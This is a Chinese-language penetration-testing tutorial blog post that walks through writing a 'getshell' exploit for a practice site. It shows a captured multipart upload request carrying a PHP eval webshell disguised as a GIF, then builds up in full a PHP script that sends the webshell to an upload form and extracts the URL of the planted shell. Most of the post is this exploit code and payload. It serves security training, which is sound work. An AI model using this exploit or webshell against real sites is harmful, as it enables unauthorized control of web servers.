1. 首页
  2. 渗透测试

[原创]WEB安全第七章exp编写篇04 getshell exp编写

【推荐学习】暗月渗透测试培训 十多年渗透经验,体系化培训渗透测试 、高效学习渗透测试,欢迎添加微信好友aptimeok 咨询。

getshell 通常是指通过某种命令或者上传漏洞得到网站的权限或服务器权限,在WEB安全里多为上传漏洞,上传木马(getwebshell)

访问暗月靶机系统,漏洞上传测试。

http://www.moontester.com/upload.php

[原创]WEB安全第七章exp编写篇04 getshell exp编写
[原创]WEB安全第七章exp编写篇04 getshell exp编写

上传漏洞测试,可以直接上传图片木马,使用burpsuite抓包

POST /upload.php HTTP/1.1

Host: www.moontester.com

User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate

Referer: http://www.moontester.com/upload.php

Content-Type: multipart/form-data; boundary=—————————11819270641735

Content-Length: 311

Connection: close

Cookie: PHPSESSID=4f6vnfrh0pkiedfdkf5uap6po5

Upgrade-Insecure-Requests: 1

—————————–11819270641735

Content-Disposition: form-data; name=”file”; filename=”1.php”

Content-Type: image/gif

<?php eval($_POST[‘cmd’]);?>

—————————–11819270641735

Content-Disposition: form-data; name=”sub”

上传

—————————–11819270641735–

用Wireshark抓的包 这种包才是最原始的包

[原创]WEB安全第七章exp编写篇04 getshell exp编写

使用php编写gethslell 需要用到sockets扩展 确保php.ini 开启socket

[php]
<?php

function http_send($host, $packet){

$sock = fsockopen($host, 80);

if(!$sock){
print "\n[-] No response from {$host}:80 Trying again…";
$sock = fsockopen($host, 80);
}

fputs($sock, $packet);

while (!feof($sock)) {

$resp .= fread($sock, 1024);
}

fclose($sock);
return $resp;

}

?>

[/php]

这段代码是模拟http发包,成功后会返回页面内容。

[php]
<?php
function data($host,$filename){

$payload = "—————————–86531354118821\r\n";
$payload .= "Content-Disposition: form-data; name="file"; filename="{$filename}"\r\n";
$payload .= "Content-Type: image/jpeg\r\n\r\n";
$payload .= ‘GIF89a’."\r\n".'<?php eval($_POST[a]) ?>’."\r\n";
$payload .= "—————————–86531354118821\r\n";
$payload .= "Content-Disposition: form-data; name="sub"";
$payload .="\r\n\r\n";
$payload .="12132\r\n";
$payload .="—————————–86531354118821–\r\n";
$packet = "POST /upload.php HTTP/1.1\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=—————————86531354118821\r\n";
$packet .= "Content-Length: ".strlen($payload)."\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $payload;

return $packet;

}

?>

[/php]

这个部分是模拟http包,—————————–86531354118821– 这个部分是提交匹配的代码。
$payload .= ‘GIF89a’.”\r\n”.”.”\r\n”;
这部分是你要上传的图片木马内容
完整的代码

[php]
<?php
function http_send($host, $packet){

$sock = fsockopen($host, 80);

if(!$sock){
print "\n[-] No response from {$host}:80 Trying again…";
$sock = fsockopen($host, 80);
}

fputs($sock, $packet);

while (!feof($sock)) {

$resp .= fread($sock, 1024);
}

fclose($sock);
return $resp;

}

function data($host,$filename){

$payload = "—————————–86531354118821\r\n";
$payload .= "Content-Disposition: form-data; name=’file’; filename='{$filename}’\r\n";
$payload .= "Content-Type: image/jpeg\r\n\r\n";
$payload .= ‘GIF89a’."\r\n".'<?php eval($_POST[a]) ?>’."\r\n";
$payload .= "—————————–86531354118821\r\n";
$payload .= "Content-Disposition: form-data; name=’sub’";
$payload .="\r\n\r\n";
$payload .="12132\r\n";
$payload .="—————————–86531354118821–\r\n";
$packet = "POST /upload.php HTTP/1.1\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=—————————86531354118821\r\n";
$packet .= "Content-Length: ".strlen($payload)."\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $payload;

return $packet;

}

$filename = "moon.php";

$host = "www.moontester.com";
print http_send($host,data($host,$filename));

[/php]

文件名
$filename = “moon.php”;

网址
$host = “www.moontester.com”;

输出上传后得内容
print http_send($host,data($host,$filename));

运行 得到如图

[原创]WEB安全第七章exp编写篇04 getshell exp编写

cmd返回信息,有很多内容 并不是想要的,所以要进行WEBSHELL的路径进行截取。返回所需的内容。完整的exp如下

[原创]WEB安全第七章exp编写篇04 getshell exp编写

[php]
<?php
function http_send($host, $packet){

$sock = fsockopen($host, 80);

if(!$sock){
print "\n[-] No response from {$host}:80 Trying again…";
$sock = fsockopen($host, 80);
}

fputs($sock, $packet);

while (!feof($sock)) {

$resp .= fread($sock, 1024);
}

fclose($sock);
return $resp;

}

function data($host,$filename){

$payload = "—————————–86531354118821\r\n";
$payload .= "Content-Disposition: form-data; name=’file’; filename='{$filename}’\r\n";
$payload .= "Content-Type: image/jpeg\r\n\r\n";
$payload .= ‘GIF89a’."\r\n".'<?php eval($_POST[a]) ?>’."\r\n";
$payload .= "—————————–86531354118821\r\n";
$payload .= "Content-Disposition: form-data; name=’sub’";
$payload .="\r\n\r\n";
$payload .="12132\r\n";
$payload .="—————————–86531354118821–\r\n";
$packet = "POST /upload.php HTTP/1.1\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=—————————86531354118821\r\n";
$packet .= "Content-Length: ".strlen($payload)."\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $payload;

return $packet;

}

$filename = "moon.php";

$host = "www.moontester.com";
$html_str = http_send($host,data($host,$filename));

preg_match("/Stored in: (.*?)</", $html_str,$m);

if ($m[1]){
echo "http://".$host."/".$m[1];
}else{
echo "flase";
}

[/php]

preg_match 这个是php里面的正则用来匹配 或 过滤内容的。

[原创]WEB安全第七章exp编写篇04 getshell exp编写

最好就会得到http://www.moontester.com/upload/4a2246d3a2fb16824a51d5e789ad553bmoon.php

[原创]WEB安全第七章exp编写篇04 getshell exp编写

原创文章,作者:mOon,如若转载,请注明出处:https://www.moonsec.com/546.html

联系我们

400-800-8888

在线咨询:点击这里给我发消息

邮件:admin@example.com

工作时间:周一至周五,9:30-18:30,节假日休息